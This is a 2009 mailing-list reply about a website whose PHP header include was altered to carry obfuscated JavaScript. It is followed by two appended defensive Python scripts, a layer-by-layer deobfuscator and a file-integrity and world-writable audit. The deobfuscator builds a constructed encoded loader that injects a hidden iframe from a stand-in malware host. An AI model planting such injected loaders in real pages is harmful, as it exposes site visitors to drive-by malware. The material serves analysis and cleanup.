Re: HACKED!
- From: Tim Greer <tim@xxxxxxxxxxxxx>
- Date: Sat, 28 Feb 2009 15:50:52 -0800
Wes Groleau wrote:
Tim Greer wrote:
Wes Groleau wrote:
I discovered that a file on a site I maintain had been altered.
You mean cracked, compromised, defaced.
All subsets of "altered," though one might argue whether malware
in Javascript that is not visible to the viewer is "defacement" :-)
Interestingly, the file is served via a PHP include, so the crackers
could not have found it without actually getting ftp or shell
access.
Your PHP script could be insecure and someone could have exploited it
to make it upload a file, or perhaps it was a bot that did it.
The PHP part does nothing but include a common file originally
containing everything from the open HTML tag to the open body tag,
and another containing the two end tags. The hacker added the
obfuscated Javascript to the head file. Could have been a 'bot.
My employer insists on using Windows, and I recently found a couple
of trojans on my work laptop that neither Symantec AV nor SpyBot S&D
could detect.
Yikes to the Windows thing (in my opinion -- please no one reply about
an OS war rant). At least with Linux (for example), the system itself
can't be infected with a virus. But, the best OS is really the one
that the admin knows better. If someone knows how to secure Windows
better than Linux, FreeBSD, Mac, or whatever else, that's what they
should use. It's not using Linux at home, work and business, because
you don't need to worry about anti-virus programs and how up to date
they are.
Anyway, I guess I now have to change all my passwords,
reload the whole site, and start thinking about paying
a little more for a provider that allows sftp and ssh.
Yeah, it could have been a weak password or a password that was used on
another site, or some infected system that was used to log into the
site at some point, etc., though it still is possible that a script on
the account was exploited and used to upload, even if the PHP script is
only supposed to do an include (or it could have been an entirely
different PHP or CGI script -- it happens if any are on the server and
are insecure). Anyway, sftp and SSH are better, but I doubt that this
compromise happened because FTP was clear text (someone would have to
root the local system or network, or the remote system or network -- in
which case probably all bets are off anyway).
Don't get me wrong, ssh/sftp/rsync over ssh, scp over ssh, etc., is better
no matter what, but it really only protects you from someone having
access to the network in that manner, which is really unlikely, and
protects you from when someone does root a server so they don't know
your password even if they've taken control of the server (this is also
where SSH keys are good). It's more likely something either system
wide where one account was compromised and the attacker was able to run
a script or command to modify any world writable files, or it was most
likely some issue where there's a forgotten about or old, insecure
script on the account somewhere. However, you might be right, too,
it's just not as common to see happen.
There are some sites that offer you a form to paste in your code and
it'll decode it from certain URLencoded hex values, if that's what
you
I don't think that will be sufficient, but I'll try it. Thanks.
I get the impression it wasn't just some URLencoded thing after all, so
that site might not help you. I don't know of a site that helps make
it clear, but it should be pretty easy to break down, if you have time.
--
Tim Greer, CEO/Founder/CTO, BurlyHost.com, Inc.
Shared Hosting, Reseller Hosting, Dedicated & Semi-Dedicated servers
and Custom Hosting. 24/7 support, 30 day guarantee, secure servers.
Industry's most experienced staff! -- Web Hosting With Muscle!
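Tim's closing point is that there is no site that will make this kind of payload readable, but it is usually easy to break down by hand. The script below is an added example for this thread, not code from either poster: it peels the layers that injected loaders of this era typically stack (eval()/unescape() wrappers around a string literal, HTML entities, %XX and %uXXXX, \xHH and \uHHHH escapes, String.fromCharCode), keeps every intermediate layer so you can see what each one hid, and pulls the URLs out of the final layer. The sample it runs on is constructed in the shape Wes describes, a script block dropped into the shared header include; the host name malware.example.invalid and the file contents are made up for the example.

```python
"""Peel common obfuscation layers off injected JavaScript.

Added example for this thread (not code from the original post). The payload
below is constructed to match the shape Wes describes, a <script> dropped into
the shared header include; the host name malware.example.invalid is made up.
"""
import html
import re
from urllib.parse import quote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# eval("...") / unescape("...") wrapping a plain string literal (no concatenation)
WRAPPER_RE = re.compile(r"(?:eval|unescape)\(\s*([\"'])(.*?)\1\s*\)", re.S)
PCT_U_RE = re.compile(r"%u([0-9A-Fa-f]{4})")          # JS unescape() %uXXXX
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")             # %XX
JS_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")  # "\x68\u0074"
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")


def peel_once(text: str) -> str:
    """One pass of every rule; returns the input unchanged if nothing applies."""
    text = WRAPPER_RE.sub(lambda m: m.group(2), text)            # drop wrapper
    text = html.unescape(text)                                    # &#x3c; &lt;
    text = PCT_U_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = JS_ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)
    text = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")
                          if n.strip()), text)
    return text


def decode_layers(text: str, max_rounds: int = 10) -> list:
    """Peel until nothing changes; every intermediate layer is kept so you can
    see what each stage of the obfuscation was hiding."""
    layers = [text]
    for _ in range(max_rounds):
        nxt = peel_once(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def scripts_in(page: str) -> list:
    """Bodies of every <script> block in a page or include file."""
    return [m.group(1).strip() for m in SCRIPT_RE.finditer(page)]


def urls_in(text: str) -> list:
    """URLs visible in a (decoded) layer: where the payload actually points."""
    return URL_RE.findall(text)


# --- constructed sample, built the way a two-layer loader usually is ---------
def _js_hex(s: str) -> str:
    """Encode each character as \\xHH, the inner layer of the constructed sample."""
    return "".join("\\x%02x" % ord(c) for c in s)


INNER_JS = ("document.write('<iframe src=\"http://malware.example.invalid/in.php\""
            " width=0 height=0></iframe>')")
LAYER2 = 'eval("' + _js_hex(INNER_JS) + '")'                          # \x-escaped
LAYER1 = 'document.write(unescape("' + quote(LAYER2, safe="") + '"))'  # %XX on top
HEADER_FILE = ("<html><head><title>Site</title>\n"
               '<script type="text/javascript">' + LAYER1 + "</script>\n"
               "</head><body>\n")

if __name__ == "__main__":
    for body in scripts_in(HEADER_FILE):
        layers = decode_layers(body)
        for i, layer in enumerate(layers):
            print("layer %d: %s" % (i, layer[:90]))
        print("URLs:", urls_in(layers[-1]))
```

The wrapper rule only handles a plain string literal inside eval()/unescape(); payloads that build the string by concatenation or by reversing/joining an array need one more hand step before the script can take over, which is why every intermediate layer is returned rather than only the last one.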
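On Tim's point that a shared-host compromise often comes down to someone else's account modifying world-writable files, and Wes's plan to reload the whole site: an added example, not code from the thread, that takes a SHA-256 manifest of a known-clean copy, later diffs it against the live tree, and lists anything under the web root that is world-writable. The directory layout, file contents and the simulated compromise in demo() are constructed for the example; the manifest is held in memory here, and in real use it belongs somewhere the web account cannot write.

```python
"""Integrity and permission audit for a small web root.

Added example for this thread (not code from the original post): a SHA-256
manifest taken from a clean copy of the site, later diffed against the live
tree, plus a list of anything world-writable. Directory layout, file contents
and the simulated compromise in demo() are constructed for the example.
"""
import hashlib
import json
import os
import stat
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> dict:
    """relative path -> sha256 for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(known_good: dict, current: dict) -> dict:
    """What changed since the manifest was taken."""
    return {
        "added": sorted(set(current) - set(known_good)),
        "removed": sorted(set(known_good) - set(current)),
        "modified": sorted(p for p in known_good
                           if p in current and known_good[p] != current[p]),
    }


def world_writable(root: str) -> list:
    """Paths under root with the other-write bit set: on a shared host these
    are the files any other account could alter without your password."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo() -> dict:
    """Constructed scenario: snapshot a clean site, then simulate the compromise
    from the thread (script appended to the shared header include, a file that
    was never part of the site, a sloppy chmod) and return the audit report."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "inc"))
        os.chmod(os.path.join(root, "inc"), 0o755)
        site = {
            "index.php": "<?php include 'inc/header.php'; ?>Hello"
                         "<?php include 'inc/footer.php'; ?>",
            "inc/header.php": "<html><head><title>Site</title></head><body>",
            "inc/footer.php": "</body></html>",
        }
        for rel, body in site.items():
            path = os.path.join(root, rel)
            with open(path, "w") as f:
                f.write(body)
            os.chmod(path, 0o644)
        # Manifest serialised to JSON, as it would be when stored off the host;
        # a manifest the attacker can edit proves nothing.
        known_good = json.loads(json.dumps(build_manifest(root)))

        # --- simulated compromise (constructed) ---
        with open(os.path.join(root, "inc/header.php"), "a") as f:
            f.write('<script>document.write(unescape("%3c%69..."))</script>')
        with open(os.path.join(root, "inc/x.php"), "w") as f:
            f.write("<?php // file that was not in the clean copy ?>")
        os.chmod(os.path.join(root, "inc/footer.php"), 0o666)

        report = diff_manifest(known_good, build_manifest(root))
        report["world_writable"] = world_writable(root)
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run build_manifest() once against the copy you trust and keep that JSON off the server; after any scare, run it again and feed both to diff_manifest(). The "added" list is the one that catches dropped scripts, which a plain "has this file changed" check misses.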